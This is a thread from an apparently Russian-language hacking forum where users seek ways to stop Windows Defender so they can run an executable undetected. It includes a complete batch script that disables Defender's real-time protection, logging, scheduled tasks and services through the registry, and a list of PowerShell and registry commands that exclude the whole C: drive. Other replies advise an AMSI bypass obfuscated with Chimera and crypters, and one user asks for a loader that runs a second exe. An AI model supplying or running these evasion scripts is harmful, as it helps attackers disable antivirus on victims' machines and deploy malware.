Batch Script for Windows Defender Exclusion - Looking for it

Отслеживать

xcrew1990

RAID-массив
Пользователь
Регистрация
12.07.2023
Сообщения
64
Реакции
2
I'm looking for a batch script that can bypass defender and Exclude thhe whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Код: 
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
 
Пожалуйста, обратите внимание, что пользователь заблокирован
KernelMode сказал(а):
Код: 
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
can i pm you ? you seem very knowladgeable in coding specially encrypting and i need to get some answers or small guide
 
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimeria again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPrefrence exclusion.
 
xmarina сказал(а):
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimeria again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPrefrence exclusion.
am not experienced, mind showing on telegram at a fee? Please send me PM
 
xcrew1990 сказал(а):
I'm looking for a batch script that can bypass defender and Exclude thhe whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.
I was about typing what you just said. but i want a loader that would do that then after few min exec another exe.
 
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


Это будет работать только на более старых версиях Windows, все, что ниже Windows 10, любая сборка после этого имеет включенную защиту от несанкционированного доступа по умолчанию, что делает это невозможным. Защита от несанкционированного доступа блокирует редактирование реестра или использование параметров командной строки MpPreference/all для изменения настроек защитника. Powershell по-прежнему отлично работает в любой системе без защиты от несанкционированного доступа. Нет необходимости в.bat файле, который легче обнаружить, чем команда.
 
Последнее редактирование:
ZeroCorp сказал(а):
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


This will only work on older versions of Windows, anything below Windows 10, any build after that has tamper protection enabled by default making this impossible. Tamper Protection prevents editing the registry or using the MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. There is no need for a .bat file, which is easier to detect than a command.
So how to bypass defender permanently?
 
ZeroCorp сказал(а):
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


Это будет работать только на более старых версиях Windows, все, что ниже Windows 10, любая сборка после этого имеет включенную защиту от несанкционированного доступа по умолчанию, что делает это невозможным. Защита от несанкционированного доступа блокирует редактирование реестра или использование параметров командной строки MpPreference/all для изменения настроек защитника. Powershell по-прежнему отлично работает в любой системе без защиты от несанкционированного доступа. Нет необходимости в.bat файле, который легче обнаружить, чем команда.
редактирование реестра либо через powershell добавление в исключение работает на всех версия по крайней мере на серверных и на десятке работает с правами админа.

а отключение дефендера вообще нет смысла да и палевно это лучше просто в исключение весь диск добавить и все
 
Dark_TM сказал(а):
editing the registry or adding it to an exception via powershell works on all versions, at least on server versions and on the top ten it works with admin rights.

but disabling the Defender makes no sense at all, and it’s too bad it’s better to just add the entire disk as an exception and that’s it
Adding entire disk using Add-MpPreference is being blocked by latest defender. Any other way?
 
Код: 
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
 
Dark_TM сказал(а):
Код: 
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
если у учетки права админа то диск добавится в исключение.
 
xcrew1990 сказал(а):
All of this is detected by latest defender Win 10
Like I said it won't work on most systems with windows 10 or higher they are tamper protected!

You can probably execute these thru a PSremoting session without tripping defender but if your trying to do it threw cmd over smb then defender will block you everytime. But if tamper protection is enabled they won't work anyway. Run "Get-MpComputerStatus" and look for "IsTamperProtected" is set to true. If the value is true you won't be able to add exclusions or disable defender over the command line anyway you will have to use the gui to disable tamper protection first. I haven't seen a windows 10/11 machine or sever 2019 or 2022 or >build 1809 without tamper protection enabled in a long time.

If executing with cmd instead of powershell use ' powershell -c "Get-MpComputerStatus" ' instead.

Как я уже сказал, это не будет работать на большинстве систем с Windows 10 или выше, они защищены от несанкционированного доступа!

Вы, вероятно, можете выполнить их через сеанс PSremoting, не отключая защитника, но если вы пытаетесь сделать это, бросая cmd через smb, то defender будет блокировать вас каждый раз. Но если включена защита от несанкционированного доступа, они все равно не будут работать. Запустите "Get-MpComputerStatus" и убедитесь, что для параметра "IsTamperProtected" установлено значение true. Если значение равно true, вы все равно не сможете добавлять исключения или отключать Defender через командную строку, вам придется сначала использовать графический интерфейс, чтобы отключить защиту от несанкционированного доступа. Я давно не видел компьютера с Windows 10/11 или сервера 2019 или 2022 или >build 1809 без включенной защиты от несанкционированного доступа.

При выполнении с помощью cmd вместо powershell используйте ' powershell -c "Get-MpComputerStatus" '.
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх